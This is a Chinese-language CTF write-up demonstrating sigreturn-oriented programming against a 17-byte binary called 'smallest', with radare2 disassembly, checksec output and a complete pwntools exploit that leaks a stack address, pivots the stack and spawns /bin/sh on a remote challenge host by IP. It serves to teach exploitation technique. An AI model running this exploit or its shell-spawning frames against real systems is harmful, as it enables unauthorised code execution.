SROP的一个实例

以前一直只是大概看过 SROP(Sigreturn-Oriented Programming)这种技术,没实践过;今天刚好遇到一道题,实践了一波,确实很方便:目标程序除了一次 read 和一个 syscall;ret 之外没有任何别的 gadget,靠伪造一个 sigreturn 帧就能一次性控制所有寄存器。

junmoxiao@cat ~/s/pd_ubuntu> r2 -A smallest                                                                             00:54:15
Warning: Cannot initialize dynamic strings
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze len bytes of instructions for references (aar)
[x] Analyze function calls (aac)
[ ] [*] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan))
0x004000b0

 -- WASTED
[0x004000b0]> afl
0x004000b0    1 17           entry0
[0x004000b0]> pdf entry0
            ;-- section..text:
/ (fcn) entry0 17
|   entry0 ();
|           0x004000b0      4831c0         xor rax, rax                ; section 1 va=0x004000b0 pa=0x000000b0 sz=17 vsz=17 rwx=--r-x .text
|           0x004000b3      ba00040000     mov edx, 0x400              ; 1024
|           0x004000b8      4889e6         mov rsi, rsp
|           0x004000bb      4889c7         mov rdi, rax
|           0x004000be      0f05           syscall
\           0x004000c0      c3             ret
[0x004000b0]>

 

 

程序(反汇编)就这么几行:read(0, rsp, 0x400),然后直接 ret 到刚读进栈顶的数据上。整个二进制只有这 17 字节一个函数,没有其它 gadget;NX 开启,但没有 PIE,地址固定在 0x4000b0:

junmoxiao@cat ~/s/pd_ubuntu> file smallest                                                                              00:54:06
smallest: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
junmoxiao@cat ~/s/pd_ubuntu> checksec smallest                                                                          00:54:12
[*] '/Users/junmoxiao/share/pd_ubuntu/smallest'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
junmoxiao@cat ~/s/pd_ubuntu>

 

最后的 exp(Python 2 + pwntools)。注意 rax 只能通过 read 的返回值(即本次收到的字节数)来控制,所以每次 send 之间都要 sleep,避免远端一次 read 把两次发送的数据合并读走,导致 rax 不等于预期值:

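#coding:utf-8
"""SROP exploit for the 'smallest' challenge (Python 2 / pwntools).

The target is a six-instruction static binary (see the r2 listing above):

    xor rax, rax ; mov edx, 0x400 ; mov rsi, rsp ; mov rdi, rax ; syscall ; ret

i.e. read(0, rsp, 0x400) followed by a ``ret`` into whatever was just read.
There are no other gadgets, NX is on and the stack address is unknown, so
the plan is sigreturn-oriented programming:

  1. Enter at the ``mov edx`` instruction (skipping ``xor rax, rax``): rax
     still holds the return value of the previous read(), i.e. the byte
     count.  A 1-byte read leaves rax == 1 == SYS_write, so the syscall
     becomes write(1, rsp, 0x400) and dumps the stack, leaking a stack
     pointer.
  2. Send a fake signal frame, then answer the next read() with exactly
     15 bytes so that rax == 15 == SYS_rt_sigreturn; the ``syscall`` then
     loads every register from the frame.  First frame: read(0, stack_addr,
     0x500) with rsp pivoted to stack_addr; second frame:
     execve("/bin/sh", 0, 0).

Because the byte *count* of each read is the only way rax is controlled,
the script sleeps between sends: over TCP two back-to-back sends may be
coalesced into a single read() on the remote side, which gives the wrong
rax.  The delays are generous for a remote target; shorten them locally.
"""
from pwn import *
import time

file_name = './smallest'
context.binary = file_name          # sets arch (amd64) for SigreturnFrame / constants
elf = ELF(file_name)
#context.log_level = 'debug'

# Gadget addresses are derived from the binary's entry point (no PIE, see
# checksec) instead of being repeated as bare literals.
entry_addr = elf.entry              # 0x4000b0: xor rax,rax; mov edx,0x400; ...; syscall; ret
if entry_addr != 0x4000b0:
    log.error('unexpected entry point %#x, gadget offsets are for 0x4000b0', entry_addr)
write_gadget = entry_addr + 0x3     # 0x4000b3: skips xor rax,rax -> rax = last read() count
syscall_addr = entry_addr + 0xe     # 0x4000be: syscall; ret

SIGRETURN_NR = int(constants.SYS_rt_sigreturn)   # 15 on amd64

#p = process(file_name)
p = remote('106.75.93.227', 20000)
#p = remote('106.75.61.55',  20000)
#gdb.attach(p, 'aslr on;b * 0x4000b0')


def deliver_and_sigreturn(stack_image, settle):
    """Send one stack image, then trigger rt_sigreturn on it.

    ``stack_image`` must be laid out as
        p64(entry_addr) | p64(syscall_addr) | str(SigreturnFrame) | ...
    The program ret's into entry_addr, i.e. a fresh read(0, rsp, 0x400) with
    rsp now at the syscall_addr slot.  We answer that read with exactly
    SIGRETURN_NR (15) bytes -- a verbatim copy of the bytes already at rsp,
    so the stack content does not change -- which makes read() return 15 in
    rax.  The following ``ret`` reaches ``syscall``, the kernel executes
    rt_sigreturn and loads all registers from the frame that sits right
    after the syscall_addr slot.

    ``settle`` is the delay in seconds between the two sends; it keeps the
    15-byte send from being coalesced with the stack image into one read().
    """
    p.sendline(stack_image)
    time.sleep(settle)
    p.send(stack_image[8:8 + SIGRETURN_NR])


# ---------------------------------------------------------------------------------
# Stage 1: leak a stack address.
#
# First stack image (24 bytes + the newline added by sendline):
#   slot0 entry_addr   -> ret here: read(0, rsp, 0x400) again, rsp now at slot1
#   slot1 write_gadget -> reached after a 1-byte read, so rax == 1: write(1, rsp, 0x400)
#   slot2 entry_addr   -> back into read() for stage 2
# The trailing newline overwrites the low byte of slot3, whose original
# content (from the process' initial stack) is what gets leaked below.
log.info('call read; call write; call read')

payload = p64(entry_addr)
payload += p64(write_gadget)
payload += p64(entry_addr)

p.sendline(payload)

time.sleep(3)
# Exactly ONE byte so that read() returns 1 == SYS_write.  It lands on the low
# byte of slot1, so it must equal the low byte of write_gadget (0xb3) to keep
# that return address intact.
p.send(chr(write_gadget & 0xff))

# -------------------------------------------------------------------------------------
# Stage 2: pivot the stack to a known address via rt_sigreturn.
leak_data = p.recvn(0x400)          # write() dumped 0x400 bytes starting at slot2

# dump[0:8] is slot2 (entry_addr); dump[8:16] is slot3, with its low byte
# clobbered by the newline.  NOTE(review): this relies on slot3 originally
# holding a pointer into the stack mapping (argv/envp area of the initial
# stack); confirm with gdb if the leak does not look like a stack address.
leak_addr = u64(leak_data[0x8:0x8+8])
print("leak_addr: %s" % hex(leak_addr))

# 0x1000 below the leaked pointer: still inside the stack mapping and away
# from the slots the program is still using.
stack_addr = leak_addr - 0x1000
print('stack_start_addr %s' % hex(stack_addr))

binsh_addr = stack_addr + 0x300     # where stage 3 places "/bin/sh\0"
print('binsh_addr: %s' % hex(binsh_addr))
log.info('stack pivot to %s' % hex(stack_addr))

# Frame 1: read(0, stack_addr, 0x500) with rsp moved to stack_addr, so the
# next image we send is both the read buffer and the new stack.
frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rdi = 0
frame.rsi = stack_addr
frame.rdx = 0x500
frame.rsp = stack_addr
frame.rip = syscall_addr

payload = p64(entry_addr) + p64(syscall_addr)
payload += str(frame)
deliver_and_sigreturn(payload, settle=10)

# Give the remote side time to execute the sigreturn and block in the
# pivoted read() before stage 3's image arrives; otherwise the 15-byte send
# and the image could be consumed by the same read().
time.sleep(5)
log.info('execve')

# Frame 2: execve("/bin/sh", NULL, NULL).  The string is placed at offset
# 0x300 of this image, i.e. at binsh_addr once the image is read to stack_addr.
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh_addr
frame.rsi = 0
frame.rdx = 0
# rsp is irrelevant on success (execve never returns); the pivot address is
# used instead of the original bare literal 0x400300 so the frame stays
# self-consistent with frame 1.
frame.rsp = stack_addr
frame.rip = syscall_addr
payload = p64(entry_addr) + p64(syscall_addr)
payload += str(frame)
payload += 'a' * (0x300 - len(payload)) + '/bin/sh\x00'

deliver_and_sigreturn(payload, settle=5)


p.interactive()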

 
